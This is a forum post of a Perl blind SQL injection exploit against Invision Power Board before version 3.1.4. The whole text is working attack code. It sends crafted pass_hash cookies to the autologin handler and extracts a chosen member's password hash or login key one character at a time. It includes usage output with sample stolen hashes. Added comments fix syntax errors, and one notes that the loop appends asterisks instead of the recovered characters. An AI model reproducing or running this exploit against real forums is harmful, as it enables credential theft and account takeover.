Kev

Exploit Hack Forum IPB> 3.1.4 CP in Perl


SQL Injection Exploit

 

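#!/usr/bin/perl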

## Invision Power Board SQL injection exploit by RTC-GNC-XxxEmchExxX
## vulnerable forum versions : 1.*, 2.*, 3.* (prior to 3.1.4)
## tested on version 1 Final and version 3.1.4
## * works on all MySQL versions
## * works with magic_quotes_gpc = On (the cookie carries %2527, a double-encoded quote, so a raw ' survives one round of decoding)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb3.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb3.pl blah.com /ipb314/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
##
## r57ipb3.pl blah.com /ipb314/ 1 2
## [~] SERVER : blah.com
## [~] PATH : /ipb314/
## [~] MEMBER ID : 1
## [~] TARGET : 2 - IPB 3.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f103c2ff0937a1e1def351c34bf22d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team N RST/GHC
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: XxxEmchExxX , www.xxxemchexxx.blogspot.com
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

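use IO::Socket;

# Command line: server, path, member_id, target (see usage()).
usage() if @ARGV < 4;

# These stay package globals on purpose: found(), crack() and check() below
# read $server, $path, $pass, $cmember_id, $s_num, $n and $i directly.
$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

# Reject values the payload cannot use: member_id is compared against the
# numeric id column, and target must be one of the three documented layouts.
usage() unless $member_id =~ /\A\d+\z/ && $target =~ /\A[012]\z/;

# Column holding the credential being extracted: IPB 1.* keeps the password
# hash in `password`, later versions in `member_login_key`.
$pass = $target ? 'member_login_key' : 'password';

# Accept "http://host" as well as a bare host name.
$server =~ s{http://}{};

$s_num   = 1;    # 1-based position of the character currently being recovered
$n       = 0;    # number of probes sent so far (drives the spinner)
$allchar = '';   # recovered output so far (was never initialised before)
$|++;            # unbuffered STDOUT so the spinner overwrites in place

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
# A ternary has exactly two branches; the three-branch form in the original
# was a compile-time syntax error.  Labels follow the target table in usage().
my $label = ($target == 2) ? ' - IPB 3.*'
          : ($target)      ? ' - IPB 2.*'
          :                  ' - IPB 1.*';
print $label;
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

# Percent-encode every byte of member_id for use in the Cookie header.
($cmember_id = $member_id) =~ s/(.)/sprintf('%%%02X', ord($1))/eg;

# Recover one character per iteration; stop at the first position for which
# neither the digit range nor the lower-case letter range yields a match.
while (1) {
    # found() narrows a range with BETWEEN probes and leaves the matching
    # ASCII code in the global $i (0 when nothing in the range matched).
    if (found(47, 58) == 0) {
        found(96, 122);
    }
    $char = $i;

    if ($char == 0) {
        if (length($allchar) > 0) {
            print "\b\b DONE ]\n\nMEMBER ID : $member_id\n";
            print(($target) ? 'MEMBER_LOGIN_KEY : ' : 'PASSWORD : ');
            print $allchar . "\r\n";
        }
        else {
            print "\b\b FAILED ]";
        }
        exit();
    }

    # NOTE(review): this appends a literal '*' (chr 42) for every recovered
    # position rather than the recovered character, so the printed result is
    # only a mask of the field's length.  Kept as posted.
    $allchar .= chr(42);
    $s_num++;
}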

# Binary-search the ASCII range [$lo, $hi] for the code of the character at
# position $s_num of the target column.  Each probe asks the server whether
# the code lies BETWEEN a midpoint and the upper bound; once the range is
# narrower than five codes, crack() tests the remaining codes one by one.
# The result is left in the global $i (0 = no match) and also returned.
# Note: the ($$) prototype only affects parsing, it does not validate args.
sub found ($$) {
    my ($lo, $hi) = @_;

    # Small enough to test each candidate directly.
    if ($hi - $lo < 5) {
        $i = crack($lo, $hi);
        return $i;
    }

    my $mid  = int($hi - ($hi - $lo) / 2);
    my $cond = " BETWEEN $mid AND $hi ";

    return check($cond)
        ? found($mid, $hi)
        : found($lo, $mid);
}

# Linear scan of the ASCII codes in [$lo, $hi): ask the server whether the
# character at position $s_num has exactly that code.  Stores the first match
# in the global $i and returns it; stores and returns 0 when no code in the
# range matches (the caller treats 0 as "end of string").
# Note: the ($$) prototype only affects parsing, it does not validate args.
sub crack ($$) {
    my ($lo, $hi) = @_;

    for my $code ($lo .. $hi - 1) {
        $i = $code;    # keep the global current for the caller
        return $i if check("= $code ");
    }

    $i = 0;
    return $i;
}

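# Send one boolean probe to the forum and report whether it came back true.
#
# $cond is an SQL comparison fragment such as " BETWEEN 97 AND 122 " or
# "= 97 ".  It is delivered through the autologin handler
# (index.php?act=Login&CODE=autologin) as a crafted pass_hash cookie whose
# decoded form is:
#
#   666%27 OR (id=<member_id> AND ascii(substring(<column>,<pos>,1))<cond>) /*
#
# <column> is the global $pass, <pos> the global $s_num, and %2527 is the
# double-encoded quote from the header comment (it becomes a raw ' after one
# round of decoding when magic_quotes_gpc is on).  The response is treated as
# "true" when it sets the cookie `session_id=0`; any other response counts as
# false.
#
# Side effects: increments the global probe counter $n and advances the
# spinner.  Returns 1 for a true probe, 0 otherwise.  Dies when the host
# cannot be reached, instead of silently reporting every probe as false.
sub check {
    my ($cond) = @_;

    $n++;
    status();

    # Fixed parts of the payload, percent-encoded:
    #   "666%27 OR (id="  and  " AND ascii(substring("
    my $prefix = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
    my $middle = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";

    # Variable tail "<column>,<pos>,1))<cond>) /*", percent-encoded byte by byte.
    my $tail = $pass . "," . $s_num . ",1))" . $cond . ") /*";
    $tail =~ s/(.)/sprintf('%%%02X', ord($1))/eg;

    # Fixed cp1251 text kept from the original script; it lands after the /*
    # comment opener, so it should have no effect on the query.
    my $trailer = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";

    # Plain HTTP on port 80 only; the script has no TLS support.  Fail loudly
    # on an unreachable host and do not hang forever on a dead one.
    my $sock = IO::Socket::INET->new(
        Proto    => 'tcp',
        PeerAddr => $server,
        PeerPort => 80,
        Timeout  => 30,
    ) or die "[-] cannot connect to $server:80: $@\n";

    # HTTP/1.0 request with CRLF line endings (the original sent bare LF,
    # which many servers tolerate but the RFC does not require).
    my $request =
        "GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\r\n"
      . "Host: %s\r\n"
      . "Accept: */*\r\n"
      . "Cookie: member_id=%s; pass_hash=%s%s%s%s%s\r\n"
      . "Connection: close\r\n\r\n";
    printf {$sock} $request,
        $path, $server, $cmember_id,
        $prefix, $cmember_id, $middle, $tail, $trailer;

    my $true = 0;
    while (my $line = <$sock>) {
        if ($line =~ /Set-Cookie: session_id=0;/) {
            $true = 1;
            last;
        }
    }
    close $sock;

    return $true;
}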

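# Advance the four-frame spinner shown after "SEARCHING PASSWORD ... [".
# Uses the global probe counter $n.  Each frame overwrites the previous one
# with two backspaces, so STDOUT must be unbuffered ($| is set at the top).
sub status {
    my @frames = ('/', '-', '\\', '|');
    # The original used $n % 5, which left a fifth state that printed nothing,
    # so the spinner appeared to stall on every fifth probe.
    print "\b\b" . $frames[$n % 4] . ']';
    return;
}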

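# Print the command-line help and exit with a non-zero status.  Called when
# fewer than four arguments are given or when they fail validation.
sub usage {
    print q(
Invision Power Board v < 3.1.4 SQL injection exploit
----------------------------------------------------
USAGE :
~~~~~~
r57ipb3.pl [server] [/folder/] [member_id] [target]

[server]    - host where IPB is installed (port 80, plain HTTP)
[/folder/]  - folder where IPB is installed, with leading and trailing slash
[member_id] - numeric user id whose credential is extracted
[target]    - forum version, see below

targets :
0 - IPB 1.*
1 - IPB 2.*
2 - IPB 3.* (prior to 3.1.4)

e.g. r57ipb3.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
    # Usage errors are errors: exit 1 so callers and shells can tell.
    exit(1);
}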

Note on the TARGET label line: as posted, `print (( $target )?( ' - IPB 3.*' ):( ' - IPB 2.*' ):( ' - IPB 1.*' ));` is not valid Perl (a ternary has only two branches), so the script fails at compile time. The replacement suggested in the original post, `print $target ( ' - IPB 3.*' );`, is also wrong: Perl parses `$target` there as a filehandle, so the label is not written to STDOUT. A replacement that follows the target table in usage() is:

print(($target == 2) ? ' - IPB 3.*' : ($target) ? ' - IPB 2.*' : ' - IPB 1.*');

Source
